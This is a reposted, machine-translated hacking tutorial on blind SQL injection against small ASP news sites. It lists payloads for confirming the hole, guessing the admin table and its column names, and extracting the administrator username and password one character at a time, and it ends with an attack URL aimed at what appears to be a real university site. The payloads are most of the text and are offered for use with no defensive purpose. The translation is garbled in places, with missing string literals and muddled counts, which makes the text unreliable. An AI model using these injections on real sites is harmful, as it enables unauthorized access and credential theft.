Learn SQL Injection
Generally, a smaller news site program in China has the "" & request vulnerability. The following describes the attack methods.
In the address bar:
And 1 = 1
Check whether the vulnerability exists. If yes, the page is returned normally. If no, an error is displayed. Continue to assume that the database on this site has an admin table.
In the address bar:
And 0 <> (select count (*) from Admin)
The returned page is normal. This is assumed to be true.
Let's assume that the Administrator table contains several administrator IDs:
And 1 <(select count (*) from Admin)
There is nothing on the page. The number of administrators is equal to or less than 1
And 1 = (select count (*) from Admin)
Input = 1 does not show an error, indicating that this site only has one administrator.
The following describes the field names of the administrator username and password in Admin.
And 1 = (select count (*) from Admin where Len (username)> 0)
An error occurred while guessing! The username field does not exist. As long as you keep changing the username field in the brackets, below are some common
User, users, Member, members, userlist, memberlist, userinfo, admin, Manager, user, yonghu
The User Name field continues to be used to guess the password field
And 1 = (select count (*) from Admin where Len (password)> 0)
The password field exists! Because the password field is usually pulled here. If not, try pass. If not, think about it.
We already know that the Administrator table contains three field IDs: user and password.
ID
User Username
Password
The following continues to explain the username and password of the Administrator. One by one. It's a little troublesome. You 'd better find a guess to solve the problem.
Guess the length first!
And 1 = (select count (*) from Admin where Len (User) <10)
The user field length is less than 10.
And 1 = (select count (*) from Admin where Len (User) <5)
User field length not less than 5
Slowly, finally, we guess the length is equal to 6. Please refer to the following. If the returned result is normal, it indicates that the guess is correct.
And 1 = (select count (*) from Admin where Len (User) = 6)
Guess the password below,
And 1 = (select count (*) from Admin where Len (password) = 10)
I guess the password is 10 characters. Don't be surprised. Now the network management is under defense, so it's not surprising that the password is 20 characters.
What we should do below is to split them up and guess one letter at a time.
And 1 = (select count (*) from Admin where left (user, 1) =)
The returned result is normal. The first letter is equal to a. Do not write uppercase letters or lowercase letters incorrectly ~~ Well, if you do not use a, you can continue to guess other characters. if you guess that the returned result is normal, it will be OK.
Start to guess the second character of the account.
And 1 = (select count (*) from Admin where left (user, 2) = AD)
In this way, you can add a character to guess the number of digits you have just guessed. Even if the account has come out
Work is not finished yet. Don't be too busy to run. There are still 10 passwords.
And 1 = (select count (*) from Admin where left (password, 1) =)
After countless errors ......
Http://xyz.hytc.edu.cn/new2/article_view.asp? Id = 2499 and 1 = (select count (*) from Admin where left (password, 10) = administra)
Result: The password is administra.
After reading the article, you should not follow my article. The online things are constantly changing, but I believe everyone's brain must be faster than him, so I hope you can read this article and use it flexibly! In this way, the desired effect can be achieved.
Article type: reposted and submitted: Sha Jia II check: netdemon